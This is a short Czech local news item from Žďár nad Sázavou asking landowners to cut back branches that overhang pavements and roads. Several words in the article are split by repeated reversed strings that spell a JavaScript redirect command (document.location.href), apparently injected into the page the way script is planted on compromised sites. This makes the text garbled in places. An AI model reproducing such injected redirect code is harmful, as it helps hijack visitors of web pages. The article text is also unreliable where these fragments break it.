Rainbow page separator

Úřad vyzývá majitele pozemků k ořezání přesahujících větví

Úterý, 6. dubna 2021

Žďár nad Sázavou / Majitele pozemků sousedících s chodníky a silnicemi žádají zástupci žďárské radnice o kontrolu, zda zeleň z jejich pozemků nezasahuje do zmíněných komunikací. Řada zahrad domků ve městě těsně sousedí se silnicí či chodníkem a zeleň z nich někdy ve větší míře přeroste či proroste skrze plot do ulice. Poté přesahující větve vadí lidem při chůzi, případně brání ve výhledu řidičům projíždějících vozidlel včetně au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusů linek městské hromadné dopravy nebo komunální techniky.
Za předpokladu, že majitelé dotčených pozemků vegetaci ze svých parcel přesahující do veřejných komunikací neodstraní, měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zvažuje přis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupení k dalším krokům v souladu s občanským zákoníkem.